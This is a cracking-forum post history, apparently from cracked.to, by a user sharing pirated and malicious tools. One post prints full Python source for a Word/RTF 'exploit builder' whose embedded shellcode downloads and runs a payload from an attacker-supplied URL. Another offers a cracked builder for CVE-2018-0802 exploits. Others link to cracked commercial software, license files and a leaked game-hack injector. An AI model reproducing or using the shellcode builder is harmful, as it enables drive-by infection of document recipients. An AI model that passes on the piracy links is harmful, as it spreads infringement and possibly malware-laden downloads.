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Everything posted by N0P

  1. I know for a fact these are gonna be good if so, +1like
  2. Hello everyone i have recently cracked a .Doc builder and found the python code for it so here it is enjoy, pretty sure this isnt fud anymore so dont use it just leaking it for fun. Source(Python): [hide] import binascii print "------------------------------------------------------------------------------------------------------------" print "------------------------------------------------------------------------------------------------------------" print "--------------------------------------Exploit Builder-------------------------------------------------------" print "--------------------------------------By ......... Cracked------------------------------------------------------" t = raw_input("Output File Name:") filename = t print(t) loop = 'false' u = raw_input("Input Direct File Download URL:") print(u) file="{\\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fcharset0 Arial;}{\f1\fswiss\fprq2\fcharset0 Berlin Sans FB Demi;}{\f2\fnil\fcharset2 Symbol;}}{/*/*/*}" file+="\x0d\x0a" file+="{\colortbl ;\red128\green128\blue0;}" file+="{\*\generator Msftedit;}\viewkind4\uc1\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent0{\pntxtb\'B7}}\fi-720\li720\qc\cf1\ul\b\i\f0\fs20 5/28/2011\cf0\ulnone\b0\i0\par" file+="\cf1\ul\b\i\f1\fs40{\pntext\f2\'B7\tab}HI ........\cf0\ulnone\b0\i0\f0\fs20\par{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\shpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv {\*}9;2;ffffffffff#0500000000000000000000000000000000000000007bd493780000807c0000807cBBBBBBBBCCCCCCCCDDDDDDDD909090909090414141414141414141414141eb7731c9648b71308b760c8b761c8b5e088b7e208b3666394f1875f2c3608b6c24248b453c8b54057801ea8b4a188b5a2001ebe334498b348b01ee31ff31c0fcac84c07407c1cf0d01c7ebf43b7c242875e18b5a2401eb668b0c4b8b5a1c01eb8b048b01e88944241c61c3e892ffffff5f81ef98ffffffeb05e8edffffff688e4e0eec53e894ffffff31c966b96f6e516875726c6d54ffd068361a2f7050e87affffff31c951518d3781c6eeffffff8d560c525751ffd06898fe8a0e53e85bffffff415156ffd0687ed8e27353e84bffffffffd0636d642e657865202f632020612e65786500" URL=u URL2="00" nxt="{}}}}}}" binnu=binascii.b2a_hex(URL) textfile = open(filename , 'w') textfile.write(file+binnu+URL2+nxt) textfile.close() print "Thank You for using my exploit builder enjoy" print "CRAP PROGRAM" [/hide] Like?
  3. Damnnn thanks man hopefully this works if so your gonna get a like :)
  4. Hello everyone today i have cracked a popular secondary opinion scanner called "HitmanPro" this is a cloud based scanner which will detect 99% of malware. Official Website: https://www.hitmanpro.com/en-us.aspx Download: [hide] https://www.dropbox.com/s/5xyono21scxd7re/HitmanPro.exe?dl=1 [/hide] LEAVE A LIKE FOR MORE LEACHERS WILL BE BANNED !!!! :kek: :fiesta:
  5. This looks good if so server sided cant it be easily cracked with Fiddler. But will test it out thanks man
  6. Hello everyone this is just a quick tutorial for the people who still use hacked clients or even still play Minecraft. This is really easy to do in 5 mins or less enjoy! Instructions: [hide] 1. Download jd-gui and dirtyjoe. 2. Once downloaded extract both rar files. 3. Open jd-gui and click open 4. open the .jar file 5. if obfuscated download this and follow the instructions on the website 6. find the main .class file such as "Protocol.class" and click on it and continue to see if there are any strings you want to change in any other file. 7. go to the .jar file your gonna skid and right click and open with Winrar 8. go to the classes you want to change and drag them on your desktop. 9. open dirtyjoe and open to the .class on the desktop. 10. go to the constant pool tab and search for the string 11. MAKE SURE IT IS UTF8 if not DO NOT modify 12. once modified click save and save it as the same name and replace the one on your desktop. 13. drag and drop the modified .class file in the same directory 14. DONE! continue if you want to do it with other files. [/hide]
  7. Hello everyone today i will be releasing Avast Premier License files that are valid until 2023,2022 and 2021. Leave a like for more codes for popular programs and i will do it. Instructions: 1. Download the Rar file below. 2. Extract it 3. Open Avast Premier (any version) 4. Go to my licenses and click enter valid code 5. click use license file and open it 6. Enjoy! Download: [hide] MirrorCreator: http://turboagram.com/H0at Dropbox: http://turboagram.com/H14T [/hide] ENJOY!!!
  8. CLOSED due to other responsibilities
  9. Hello everyone it has been a while since i have posted on this forum anyway here it is the one and only Vape Injection Client. You can get 64/32 bit and also 1.7.10/1.8.9 versions, i did not crack this program so please if your unsure RUN IN VM/SANDBOXIE but im pretty sure its clean been using it for a while so here you go. :feelsgood: VirusTotal: https://www.virustotal.com/#/file/2d3c1e4c2f7b24428adbb942cf26e3b006921dd8a97c100b6542e31f0183827e/detection Obvious there are detections cause it injects and its a game hack xD [hide] MirrorCreator: https://www.mirrored.to/files/U3PJQNAC/VAPE_LEAKED_by_ribthegreat99.rar_links DROPBOXDIRECTDOWNLOAD [/hide] if links go down message me or replay! ENJOY!!! also leave a like if you want more. :feelsgood: :smart: :kek:
  10. Guys he probably leeched off of me just in case downlaod form my thread i made long time ago trusted my a lot of people: https://cracked.to/Thread-The-Ultimate-Survey-Bot-Latest-Crack-by-ribthegreat99
  11. Hello everyone today i have cracked all Tangible Solutions tools. Official Website: https://www.tangiblesoftwaresolutions.com/ ---------------------------------------------- Rar Includes: C# To C++ Converter C++ To C# Converter C++ To Java Converter C++ To VB Converter C# To Java Converter Instant C# Instant VB Java To C# Converter Java To C++ Converter Java TO VB COnverter VB To C++ Converter VB To Java Converter ------------------------------------------------- VirusTotal: https://www.virustotal.com/#/file/87d9c59a56be8a41f6489b9c91b5543888dcdcf0fb6b5c7676254a633630bb97/detection ------------------------------------------------- Rar Password: Ribthegreat99Crack ------------------------------------------------- Downloads: [hide] MirrorCreator: http://www.mirrorcreator.com/files/0HYKCII2/All_Cracked_Tangible_solutions.rar_links Mega.nz: https://mega.nz/#!QPwSHbRa!J6ZKubSSDSCPAtx8JC9KEfQzl5ZIXdTko3hIL-nhiA4 [/hide] ------------------------------------------------- Enjoy P.S Leechers will be banned! ------------------------------------------------- :hype: :hype: :fiesta: :fiesta: :feelsgood: :kek:
  12. Nice job man also watch how many leechers there will be replying to this XD
  13. Hello everyone today im posting a really good theme that i cracked! which is Bunifu 1.5.3 this theme is for VB.Net Users, if you want C# then just convert the code using: https://www.carlosag.net/tools/codetranslator/ Downloads: [hide] Mega.nz: https://mega.nz/#!4LZyDA4I!Ev_3yiOZ6wSjqJF3DjUCk4AUYrlY9YWVhpq2PB2f9W8 Mirrorcreator: http://www.mirrorcreator.com/files/1QRUFQLY/Bunifu_UI_v1.5.3.dll_links [/hide] VirusTotal: https://www.virustotal.com/#/file/76e1d3ec95fdef74abaf90392dd6f4aa5e344922abf11e572707287d467f2930/detection 1 false positive Instructions: Download Bunifu 1.5.3 above Open Visual Studio Create a new form Go to your toolbox and right click Click add tab Call your tab anything Right click on the tab you created and click choose items Click browse and find your Bunifu 1.5.3 Click OK Enjoy!
  14. Hello everyone today im posting this crack The Ultimate Survey Bot which i cracked. All details and features on main website: http://www.ultimatesurveybot.com/ I posted this crack a few weeks ago on Nulled and got banned from it which was bs and they didnt really give me a reason for it but here you go! Downloads: [hide] Mega.nz: https://mega.nz/#!tGpTXIKT!cLq9ezTWx7r6E-N8Pf8c6qrZUq0owFxFszSVmNyj3yE Mirrorcreator: http://www.mirrorcreator.com/files/DGFDZMF4/Ultimate_Survey_Bot_V2.3_Cracked_by_Ribthegreat99.exe_links [/hide] VirusTotal: https://www.virustotal.com/#/file/4107d7b2c8d86bb5e5dc81a3cfb7a244dcfa610687977abb0c9e2199ea3fa2f3/detection 4 false positives Enjoy!
  15. when you download it and try build the exe with the exploit in it you cant because it is disabled until you donate
  16. Hello everyone today im creating my first cracking.to topic. Because i got banned on nulled for apparently spamming/leeching when i dont, so this will be my new website that im going to be releasing cracks by me! :fiesta: :pepo: Today i have Shokan which was created by Bango3601 on nulled. It is a exploit builder for CVE-2018-0802 so here you go Sorry Bango3601 for this but i wouldn't have released it if you hadn't ban me :fyou: [hide] Downloads: mega: https://mega.nz/#!9Pp1kJ4b!yWPYrLvhSckEVirh7lW4WHBuNYzPmgtuMXj-bxHz31M Mirrorcreator: http://www.mirrorcreator.com/files/8LSKIOHY/Shokan_Cracked_By_Ribthegreat99.rar_links [/hide] VirusTotal: https://www.virustotal.com/#/file/0491900a6b7b7a9bb72a097b34a23e22f2e43e528e59a4b800be0985bf5fceb9/detection Detection from the exploit Just enter anything for the password Enjoy!